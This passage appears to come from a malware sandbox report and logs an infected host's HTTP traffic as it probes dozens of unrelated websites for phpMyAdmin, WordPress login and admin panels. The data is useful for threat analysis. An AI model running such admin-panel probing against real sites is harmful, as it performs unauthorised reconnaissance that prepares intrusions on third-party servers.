Feb 21, 2024 00:26:13.562124014 CET	220	IN	HTTP/1.1 301 Moved Permanently Server: openresty Date: Tue, 20 Feb 2024 23:26:13 GMT Content-Type: text/plain Content-Length: 0 Connection: keep-alive Location: https://cfgteam.com/wp-admin/ ETag: "65d0dd59-0"

Session ID	Source IP	Source Port	Destination IP	Destination Port
289	192.168.2.6	61341	3.33.130.190	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:12.329324961 CET	172	OUT	GET /PhpMyAdmin/ HTTP/1.1 Host: cfgteam.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:12.426215887 CET	222	IN	HTTP/1.1 301 Moved Permanently Server: openresty Date: Tue, 20 Feb 2024 23:26:12 GMT Content-Type: text/plain Content-Length: 0 Connection: keep-alive Location: https://cfgteam.com/PhpMyAdmin/ ETag: "65d0dd59-0"

Session ID	Source IP	Source Port	Destination IP	Destination Port
290	192.168.2.6	61285	217.160.0.179	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:12.359812021 CET	163	OUT	GET /pma/ HTTP/1.1 Host: upblue.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:15.836905956 CET	560	IN	HTTP/1.1 200 OK Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Keep-Alive: timeout=15 Date: Tue, 20 Feb 2024 23:26:15 GMT Server: Apache Content-Encoding: gzip Data Raw: 31 35 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 85 91 4d 4f 84 30 10 86 ef 26 fe 87 b1 89 47 18 c8 7a 30 4a 39 b8 1f d1 64 fd 88 61 a3 1e bb 30 2b 44 a0 b5 14 d9 f5 d7 4b bb dd b8 17 23 97 96 c9 3b f3 be cf 34 39 9b 3d 4e b3 b7 a7 39 94 a6 a9 e1 69 75 b3 bc 9b 02 0b 10 5f 26 53 c4 59 36 83 d7 db ec 7e 09 71 18 c1 42 8b 86 3a 32 88 f3 07 06 ac 34 46 5d 21 0e c3 10 0e 93 50 ea 77 cc 9e 71 6b e7 c4 b6 d1 5f 83 8d ef 0a 0b 53 b0 f4 f4 24 b1 0a 77 92 28 ec 69 2a 53 53 da 2b 58 d7 3d 25 b8 ff 1d eb 0d 19 01 ed 68 c9 d9 07 ed 06 a9 8b 8e 41 2e 5b 43 ad e1 8c 01 da e6 23 51 41 5d ae 2b 65 2a d9 fe a1 b3 89 03 fa ec ab 2f ce fc a0 c0 ec 14 1d c9 0d 6d 0d da 84 d7 90 97 42 8f b4 7c 95 2d 82 4b 6f 87 a5 0f 7d a0 02 2d 87 8e b3 38 8a ce 1d 9c ab 43 a7 73 ee f6 d3 8d 0b ea 95 05 0b 2f ea aa 11 61 41 88 aa 11 c8 c0 71 72 e6 b9 19 b8 ce f5 48 49 9a b3 88 41 2b 35 75 d5 f7 48 7f b8 31 47 dc ca bd b7 a5 5f cb 62 e7 56 19 ff ee af 8c 6d 45 a5 89 80 52 d3 e6 bf 1c a9 7f 46 9f 72 cc 67 e3 25 28 52 b0 5f 82 ca 8e c3 83 13 1e db e3 61 0b 4e e2 de f5 07 53 5e 83 5a 51 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 15fMO0&Gz0J9da0+DK#;49=N9iu_&SY6~qB:24F]!Pwqk_S$w(iSS+X=%hA.[C#QA]+e/mB\|-Ko}-8Cs/aAqrHIA+5uH1G_bVmERFrg%(R_aNS^ZQ0

Session ID	Source IP	Source Port	Destination IP	Destination Port
291	192.168.2.6	61400	185.230.63.107	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:12.368634939 CET	171	OUT	GET /pma/ HTTP/1.1 Host: sportclinic.co.il Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:12.527205944 CET	1286	IN	HTTP/1.1 404 Not Found Date: Tue, 20 Feb 2024 23:26:12 GMT Content-Type: text/html; charset=utf-8 Connection: keep-alive x-wix-request-id: 1708471572.408147780665912078 Age: 0 Server-Timing: cache;desc=miss, varnish;desc=miss, dc;desc=42 X-Seen-By: VtqAe8Wu9wvSsl49B/X4+ewfbs+7qUVAqsIx00yI78k=,m0j2EEknGIVUW/liY8BLLupO/enPqTWY4Qy4iOZWWztGkFvVdT2Nq6f3Hedj7ewB,2d58ifebGbosy5xc+FRalsoSJzyy0KqDQmXrJLlcagszbeeK9XHxfiHHgjePkg5s2Aaq70LSJGqAO5U/6dUqpQ==,2UNV7KOq4oGjA5+PKsX47K0eODJntj8FkQmv0QgFYbsfbJaKSXYQ/lskq2jK6SGP,O/1L7HVJdzQznP2rkpsRxjnWIsxCDt4gAQNDCnrR7Tg=,dn3KCFG1ABRFI3k8Pxb+UPKGhCOcg1Te7BjeKJn52gQ=,/j+AjfLiOiE0Vc9NsP8sK0UzapQezJmOE4ftHD8wysr02rOVQGO3V+wt2yp1bCcsW+nD4K+d/1sEfg+bm9SCNQ== Vary: Accept-Encoding X-Content-Type-Options: nosniff Content-Encoding: gzip Transfer-Encoding: chunked Data Raw: 34 34 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a5 56 dd 6f db 36 10 7f cf 5f c1 e8 45 2d 10 8a 96 97 d4 4e 26 05 e8 b2 0c cb cb 30 6c 28 b0 a1 28 0a 5a 3a 5b 4c 28 52 25 a9 d8 46 d7 ff 7d 77 92 ec 39 71 b0 c6 89 1f 6c f3 c8 fb f8 dd 37 63 d9 31 e7 8c 71 7e 79 74 94 1d 97 b6 08 eb 06 58 15 6a 7d 89 67 ce 8f 18 7e e8 36 23 1a 33 0b 2e 9b 26 8f 96 6a 75 ed 9c 75 bf cb 05 f8 f7 4d 13 d1 03 90 e5 25 be cf 6a 08 92 19 59 43 1e dd 2b 58 36 d6 85 88 15 d6 04 30 81 58 cb 50 e5 25 dc ab 02 78 77 38 51 46 05 25 35 f7 85 d4 90 a7 27 ac 96 2b 55 b7 f5 7f 84 d6 83 eb 4e 72 86 2f 8c 45 7d 1b 45 45 25 9d 07 14 dc 86 39 9f ee 5c 54 21 34 1c be b4 ea 3e 8f fe e2 1f de f3 2b 5b 37 32 28 94 b0 63 ce cd 75 0e e5 02 7a be a0 82 06 02 39 53 a6 cc a3 b8 41 78 9f 3b 62 cc fe 61 c1 49 e3 b5 0c f8 38 13 1d f5 31 dc 12 7c e1 54 13 94 35 3b 2a 76 6c 3a c0 2b 7b 5c ce ce 6c f0 3b 72 8d 45 2b 61 75 c2 8c 9d 5b ad ed b2 67 d9 06 94 42 97 69 65 ee 18 05 35 8f 54 8d 70 44 63 16 11 ab 1c cc f3 48 88 e5 72 99 60 2c 93 c2 d6 62 2e 31 24 d6 24 f8 15 31 07 3a 8f 7c 85 a1 2b da c0 88 be 27 bc 17 bd 91 e4 03 ba b6 48 1a e9 a4 0f d6 a1 a6 4e 28 c6 8d 02 ed 45 a8 94 2b 39 5e 87 b5 98 63 2e 78 f1 2b e8 7b 40 1e d9 9d 7f 91 05 72 78 c4 d7 ab 0e 6b 0d be 02 c0 d4 e9 ad 0f b0 0a a2 7b 20 3a b7 ef c0 ec 2d d9 e3 7b ae 69 e8 00 de b4 33 ad 0a 91 26 93 f4 3c 19 09 df a9 17 40 39 8e 46 63 92 0f a4 ce c4 87 fa 33 d1 67 7e 36 b3 e5 9a 69 69 16 79 04 18 7f 4c Data Ascii: 443Vo6_E-N&0l((Z:[L(R%F}w9ql7c1q~ytXj}g~6#3.&juuM%jYC+X60XP%xw8QF%5'+UNr/E}EE%9\T!4>+[72(cuz9SAx;baI81\|T5;*vl:+{\l;rE+au[gBie5TpDcHr`,b.1$$1:\|+'HN(E+9^c.x+{@rxk{ :-{i3&<@9Fc3g~6iiyL
Feb 21, 2024 00:26:12.527230978 CET	627	IN	Data Raw: 23 4a 7a 87 a1 01 97 47 db 7a b9 da 12 99 f4 ac 53 41 65 74 15 9c c6 e0 6a e9 3d f2 6f 15 53 bd f5 b2 fa 9b af b1 07 14 5b 4a b7 e6 33 59 dc 2d 9c 6d 4d 19 5f 30 e5 ff dc 5c fc b4 a5 7f 43 5b c9 53 1f d5 9c e9 c0 6e ae d9 f9 27 a4 f4 59 ca bc 2b Data Ascii: #JzGzSAetj=oS[J3Y-mM_0\C[Sn'Y+(3+Uq6V&EdDUvA6wA4/-5?%`J5u"({A71NFg%q(K~b <~7_=*Z-5pA!OsnUnO`>Or

Session ID	Source IP	Source Port	Destination IP	Destination Port
292	192.168.2.6	61302	188.40.92.90	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:12.370888948 CET	169	OUT	GET /wp-login.php HTTP/1.1 Host: joaz.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:12.545363903 CET	139	IN	HTTP/1.1 302 Found Location: https://www.domainmarkt.de/joaz.de Server: Caddy Date: Tue, 20 Feb 2024 23:26:12 GMT Content-Length: 0
Feb 21, 2024 00:26:13.791817904 CET	211	OUT	GET /wp-admin/ HTTP/1.1 Host: joaz.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://www.domainmarkt.de/joaz.de
Feb 21, 2024 00:26:13.966372013 CET	139	IN	HTTP/1.1 302 Found Location: https://www.domainmarkt.de/joaz.de Server: Caddy Date: Tue, 20 Feb 2024 23:26:13 GMT Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
293	192.168.2.6	61455	104.21.66.152	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:12.378174067 CET	171	OUT	GET /phpmyadmin/ HTTP/1.1 Host: att.com.tw Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
294	192.168.2.6	61401	45.136.114.149	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:12.380163908 CET	171	OUT	GET /admin HTTP/1.1 Host: archononline.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:12.485740900 CET	439	IN	HTTP/1.1 404 Not Found Date: Tue, 20 Feb 2024 23:26:12 GMT Server: Apache/2.4.18 (Ubuntu) Content-Length: 278 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 72 63 68 6f 6e 6f 6e 6c 69 6e 65 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.18 (Ubuntu) Server at archononline.com Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
295	192.168.2.6	61353	103.224.182.253	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:12.414539099 CET	167	OUT	GET /pma/ HTTP/1.1 Host: hotmail.fr.au Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:12.571167946 CET	241	IN	HTTP/1.1 429 Too Many Requests content-length: 117 cache-control: no-cache content-type: text/html connection: close Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 32 39 20 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3c 2f 68 31 3e 0a 59 6f 75 20 68 61 76 65 20 73 65 6e 74 20 74 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 20 69 6e 20 61 20 67 69 76 65 6e 20 61 6d 6f 75 6e 74 20 6f 66 20 74 69 6d 65 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>429 Too Many Requests</h1>You have sent too many requests in a given amount of time.</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
296	192.168.2.6	61354	213.186.33.4	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:12.418498993 CET	169	OUT	GET /pma/ HTTP/1.1 Host: art-paix-di.org Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:12.579782009 CET	432	IN	HTTP/1.1 404 Not Found date: Tue, 20 Feb 2024 23:26:12 GMT content-type: text/html; charset=iso-8859-1 content-length: 196 server: Apache x-iplb-request-id: BF60E3DE:EFAA_D5BA2104:0050_65D53514_D8C7:19A2 x-iplb-instance: 51886 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
297	192.168.2.6	61355	81.169.145.143	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:12.434287071 CET	168	OUT	GET /pma/ HTTP/1.1 Host: d-brinkmann.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:12.615757942 CET	355	IN	HTTP/1.1 404 Not Found Date: Tue, 20 Feb 2024 23:26:12 GMT Server: Apache/2.4.58 (Unix) Content-Length: 196 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
298	192.168.2.6	61585	15.197.204.56	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:12.471950054 CET	171	OUT	GET /PhpMyAdmin/ HTTP/1.1 Host: att.com.au Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:12.566371918 CET	221	IN	HTTP/1.1 301 Moved Permanently Server: openresty Date: Tue, 20 Feb 2024 23:26:12 GMT Content-Type: text/plain Content-Length: 0 Connection: keep-alive Location: https://att.com.au/PhpMyAdmin/ ETag: "65d0dd59-0"
Feb 21, 2024 00:26:12.773861885 CET	221	IN	HTTP/1.1 301 Moved Permanently Server: openresty Date: Tue, 20 Feb 2024 23:26:12 GMT Content-Type: text/plain Content-Length: 0 Connection: keep-alive Location: https://att.com.au/PhpMyAdmin/ ETag: "65d0dd59-0"

Session ID	Source IP	Source Port	Destination IP	Destination Port
299	192.168.2.6	61497	85.214.145.11	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:12.482621908 CET	173	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: braekling.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:12.662702084 CET	394	IN	HTTP/1.1 301 Moved Permanently Server: nginx/1.18.0 (Ubuntu) Date: Tue, 20 Feb 2024 23:26:12 GMT Content-Type: text/html Content-Length: 178 Connection: keep-alive Location: https://braekling.de/phpMyAdmin/ Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
300	192.168.2.6	61554	64.190.63.136	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:12.534754038 CET	203	OUT	GET /PhpMyAdmin/?usid=15&utid=26948359291 HTTP/1.1 Host: ww1.imailzone.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:12.745248079 CET	1286	IN	HTTP/1.1 200 OK date: Tue, 20 Feb 2024 23:26:12 GMT content-type: text/html; charset=UTF-8 transfer-encoding: chunked vary: Accept-Encoding x-powered-by: PHP/8.1.17 expires: Mon, 26 Jul 1997 05:00:00 GMT cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 pragma: no-cache x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_bemz3cqLtIJBY9CL/rNeOx9MEtTr/5lWfWvZWnRWUIb2L2LDOtq7FgIaJG6xnm0LjPO071nk/+81NXZf1WXgUw== last-modified: Tue, 20 Feb 2024 23:26:12 GMT x-cache-miss-from: parking-6db66cd898-zpcjt server: NginX content-encoding: gzip Data Raw: 32 42 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 59 eb 72 db 36 16 fe bf 4f 81 aa e3 9d a6 15 25 4a b6 64 99 8a 33 e3 dc 5a 27 ce ad 4d d6 49 33 99 0c 48 82 22 62 12 60 08 50 97 68 35 b3 af b1 af b7 4f b2 07 00 49 91 14 a5 d8 9d 46 13 8b 04 70 0e ce e5 3b 17 40 f7 7f 78 fc ea d1 db 0f af 9f a0 50 c6 d1 83 fb ea 2f 8a 30 9b 9d 77 08 eb 20 e4 63 89 2d ec bb 11 f7 6e 6e c8 ea fc c5 d3 c5 e2 f1 9b 0f cf 9e f3 3f 2f c3 b9 f7 f2 e2 cd 93 87 0f df 5c 3c fe 63 71 b1 f8 e3 e2 d9 c3 8b 97 6c 15 5d 2f 86 f3 ab 0f 27 e1 3b 76 b6 b0 c7 df de 3c 77 c3 e7 0f 83 f9 97 a7 ef 1e 09 ff 69 e4 8e df fa 6f c2 a5 7b f6 fb fb eb f7 d9 e5 89 3c 1e 78 bf f0 49 f0 e1 d5 bc 2f 26 5f 07 57 bf be 9e e1 e3 c7 4f 06 57 7d f9 db bb 93 ab 27 2f 5f 3c ba 58 3c b9 b8 78 73 7e fe d9 25 f1 b7 63 ef eb 95 bc 7c f6 f0 c3 d9 a3 ab 7e fa 92 bc 5a 9e bd 78 22 df a6 fd 51 74 1d 5c cf ff bc 66 bf 5f bf bb 74 87 57 c3 ab c7 af e4 d7 d3 a7 b3 4b fc ec d7 f1 92 c5 f6 d5 97 d7 af ec d3 01 bb e9 ff 32 19 bc 7c ff 67 30 b8 7e 3f 7b b7 38 3f 07 d5 09 f6 1f dc 8f 89 c4 c8 0b 71 2a 88 3c ef 64 32 b0 26 9d 07 f7 25 95 11 79 40 63 4c a3 6f 9c 91 9e c7 e3 7f 32 57 24 53 cb 7c 95 33 e8 77 22 78 96 7a 44 20 cc 7c 74 c9 02 9e c6 58 52 ce 7a f7 fb 86 8b d9 82 e1 98 9c 77 e6 94 2c 12 9e ca 0e f2 38 93 84 c1 96 0b ea cb f0 dc 27 73 ea 11 4b bf 74 29 a3 92 e2 c8 12 1e 8e c8 f9 a0 67 77 63 bc a4 71 16 57 46 32 41 52 fd 8a 5d 18 b1 3b b5 6d 7c 22 bc 94 26 4a 8c ca 4e 35 75 10 15 68 05 92 a3 80 a6 42 6a e1 5d 02 0f 46 1b 04 6a 20 1c 45 88 07 48 86 04 d1 ad 5e 8a ea 7f ff f9 6f 4a 50 c4 f9 0d 65 33 b5 b6 87 9e a6 c0 73 46 18 49 71 84 24 4f a8 27 e0 0b c5 1c 16 02 93 45 88 a5 a2 44 0b 9e 45 3e 22 cb 84 78 52 2d 08 28 ec 1c 92 94 74 51 5d be 10 0b 44 a5 12 a2 87 ae 09 0a 79 42 34 03 4d 50 b2 c3 c0 5e 10 9c 7a 61 2e c9 0f 60 89 88 b2 9b 7f a0 fc 5f 4a 22 50 1d 8c d0 29 87 e4 Data Ascii: 2B7Yr6O%Jd3Z'MI3H"b`Ph5OIFp;@xP/0w c-nn?/\<cql]/';v<wio{<xI/&_WOW}'/_<X<xs~%c\|~Zx"Qt\f_tWK2\|g0~?{8?q*<d2&%y@cLo2W$S\|3w"xzD \|tXRzw,8'sKt)gwcqWF2AR];m\|"&JN5uhBj]Fj EH^oJPe3sFIq$O'EDE>"xR-(tQ]DyB4MP^za.`_J"P)
Feb 21, 2024 00:26:12.745255947 CET	1286	IN	Data Raw: 2a 21 da 1c 33 d2 4f d8 6c 3b 11 a6 24 38 ef f4 fb 34 9e f5 04 f1 79 82 53 a5 a1 92 a7 2f 49 9c 44 58 12 d1 8f f8 8c 8b be 9a ff ac 1e 7b 9a 45 ff c1 7d 21 57 e0 ee 92 59 ff e7 1f 10 53 56 8b e8 37 50 49 08 34 3f ed d9 3d 1b fd 1b bd b8 7c 8b ae Data Ascii: *!3Ol;$84yS/IDX{E}!WYSV7PI4?=\|Lx576QfGXt?UA-bBz%RZVB~Z:2TR/"],O]+SO`;COs~)]x&3S2;Ynt
Feb 21, 2024 00:26:12.745368958 CET	788	IN	Data Raw: b4 93 dd d5 cc fc 86 12 2b 86 36 09 cf c8 ba 3c 9c 04 74 49 fc 69 9e b3 a0 bb da b6 5c d5 92 37 0a d4 a7 19 b6 79 5c 5a ea a0 a2 c3 b6 18 c8 d9 35 73 79 5d 86 76 ec 07 41 70 6b 92 7a da 38 2a d2 48 6a 0e 16 a3 a3 db 30 d2 f9 08 fc 0f e7 b3 75 a3 Data Ascii: +6<tIi\7y\Z5sy]vApkz8*Hj0upWev7`Dejkj{+Ekduff]cr$_Pt-ToOs7"noFpWWc1@23C9i03;`0LXQu
Feb 21, 2024 00:26:12.745765924 CET	1286	IN	Data Raw: 35 37 31 0d 0a e4 1b 69 73 ab 38 f2 fb fe 0a 96 a9 7d 47 95 0f 0e df 89 33 95 89 93 f7 e2 0a 38 07 4e e2 6c 6d 4d 61 10 06 1b 03 0b f8 4c bd ff be 2d 09 30 60 1c fb 4d cd 87 99 da 54 bd 97 20 b5 5a ad 56 ab 2f b5 26 91 2b 9a 6a 88 a3 90 3d 6f 7d Data Ascii: 571is8}G38NlmMaL-0`MT ZV/&+j=o}gc\|Rob+Iz8?O]?T`fC&8QiT!@852DR~}w`I$dY#9UdE#pfo64LV,x{r}<>1("_"
Feb 21, 2024 00:26:12.746175051 CET	1286	IN	Data Raw: cf e5 ed 44 90 95 e7 b9 a4 dc ae e4 cb 19 c0 5c ae af 94 eb ed 95 72 d9 bf 52 86 82 34 bd e5 07 bd 89 28 5f da 69 0e f5 25 e0 2c 86 07 98 be ac cc fa 12 cc 31 e8 3d 88 92 32 14 a5 c9 6c 75 35 ac f5 a5 4b f8 0d 78 08 ee 87 59 5d ea 49 6b 79 ab f1 Data Ascii: D\rR4(_i%,1=2lu5KxY]Iky@z\/h9H45D ?[huKKn6I)og[@&z(6o=UH<G0LX`,_8d$G] l@4[,WF.zfbO
Feb 21, 2024 00:26:12.746200085 CET	1286	IN	Data Raw: de c7 f9 7c fe 48 a0 5b 2b 54 c5 77 ef de bd ef 7b ef e5 9c de 47 46 de 63 e1 a8 29 f4 8e 2d 07 64 e7 a9 c1 57 c1 9b 7a d7 66 ea 78 f6 06 83 de f8 f8 b4 37 18 3c d1 c9 e3 88 cc 4e be 4c 92 65 cc 2d 10 c8 b8 f1 65 e9 97 1c 1f d2 97 73 7f 01 c1 58 Data Ascii: \|H[+Tw{GFc)-dWzfx7<NLe-esXOH.\?OO1\|x5#O>xsp?:,haB% +p<AEK{s-Y9~c;@c9QH&[<It8+-~qSBs7q}).@E:
Feb 21, 2024 00:26:12.746453047 CET	647	IN	Data Raw: 36 e5 83 f6 e7 40 5b 06 71 6a e1 82 b2 e3 47 3a 62 1d 7d 2d 85 1f 14 60 b2 e8 71 ab 00 a4 6c e0 55 a7 05 14 91 01 48 51 36 6e 14 26 a1 25 b9 ca 94 4e 4d a8 70 53 15 94 65 d3 01 2f 7c ca 66 83 0d 0a 32 31 44 0d 0a db a0 81 c0 8b 53 77 b5 4e b2 84 Data Ascii: 6@[qjG:b}-`qlUHQ6n&%NMpSe/\|f21DSwNe(-Y^`#6iy\;F0!;f\A!e`(#],e6.@eY:roT9IDg}O<A2'04j`uc\|K-<\&_=E~M!

Session ID	Source IP	Source Port	Destination IP	Destination Port
301	192.168.2.6	61500	23.236.62.147	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:12.539463043 CET	173	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: gmcocorp.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
